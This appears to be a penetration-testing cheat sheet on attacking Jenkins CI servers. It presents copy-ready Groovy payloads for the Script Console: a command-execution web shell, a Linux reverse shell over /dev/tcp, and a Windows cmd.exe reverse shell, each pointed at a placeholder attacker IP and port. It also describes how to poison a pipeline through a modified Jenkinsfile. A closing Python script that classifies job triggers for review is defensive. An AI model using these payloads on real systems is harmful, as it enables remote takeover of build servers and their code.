Jenkins

CI/CD (Continuous Integration / Continuous Delivery/Deployment) platform.

Jenkins is an open-source automation server written in Java that helps developers build and test their software projects continuously. It is a server-based system that runs in servlet containers such as Tomcat.

Attacks

Jenkins Application

Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console (/script). The Script Console allows us to run arbitrary Apache Groovy scripts within the Jenkins controller runtime. Groovy is an object-oriented, Java-compatible language. Groovy source code is compiled into Java bytecode and can run on any platform that has a JRE installed.

WebShell
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

LinuxRevShell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

WindowsRevShell
String host="<IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Poisoning the Pipeline

Even though we can modify the Jenkinsfile (for example, in a Git repository), we still need to check how the build is started. Jenkins might be configured to run only on manual intervention; if this is the case, we need to keep exploring. It might also be configured to routinely execute the pipeline. In such a scenario, we won't know how to trigger it until it executes. However, Jenkins might also be configured to run the build on each change to the repo. This is typically done by having the SCM server call a webhook for specific triggers. We can check in the settings whether the repository contains any configurations that will execute a pipeline on certain actions.
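
The same three cases (manual only, scheduled, built on each repository change) can be reviewed from the Jenkins side by reading a job's config.xml. The script below is an added example, not part of the original page: it classifies a job's triggers so that jobs a repository change alone can start are easy to list for review. The sample configs are constructed, and only the three trigger classes in the map are recognised.

```python
import xml.etree.ElementTree as ET

# Trigger element names written to config.xml by Jenkins core and the GitHub plugin.
TRIGGER_KINDS = {
    "hudson.triggers.TimerTrigger": "scheduled",       # "Build periodically"
    "hudson.triggers.SCMTrigger": "scm-poll",          # "Poll SCM"
    "com.cloudbees.jenkins.GitHubPushTrigger": "webhook",
}

# Constructed sample configs (not taken from a real Jenkins instance).
PIPELINE_JOB = """<flow-definition>
  <properties>
    <org.jenkinsci.plugins.workflow.job.properties.PipelineTriggersJobProperty>
      <triggers>
        <com.cloudbees.jenkins.GitHubPushTrigger><spec></spec></com.cloudbees.jenkins.GitHubPushTrigger>
        <hudson.triggers.TimerTrigger><spec>H 2 * * *</spec></hudson.triggers.TimerTrigger>
      </triggers>
    </org.jenkinsci.plugins.workflow.job.properties.PipelineTriggersJobProperty>
  </properties>
</flow-definition>"""
MANUAL_JOB = "<project><triggers/></project>"


def classify_triggers(config_xml):
    """Return sorted (kind, spec) pairs for every known trigger in a job config."""
    root = ET.fromstring(config_xml)
    found = set()
    # iter() walks the whole tree, so triggers nested under a Pipeline job's
    # properties are found as well as a freestyle job's top-level <triggers>.
    for elem in root.iter():
        kind = TRIGGER_KINDS.get(elem.tag)
        if kind:
            found.add((kind, (elem.findtext("spec") or "").strip()))
    return sorted(found)


def review(config_xml):
    """Summarise how a job starts and whether a repo change alone can start it."""
    triggers = classify_triggers(config_xml)
    kinds = {kind for kind, _ in triggers}
    return {
        "triggers": triggers,
        "manual_only": not triggers,
        "builds_on_repo_change": bool(kinds & {"scm-poll", "webhook"}),
    }


if __name__ == "__main__":
    for name, xml in (("pipeline", PIPELINE_JOB), ("manual", MANUAL_JOB)):
        print(name, review(xml))
```

A job reported as manual_only may still be started by mechanisms outside this map, such as multibranch indexing or triggers from other plugins, so treat the result as a starting point for review.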
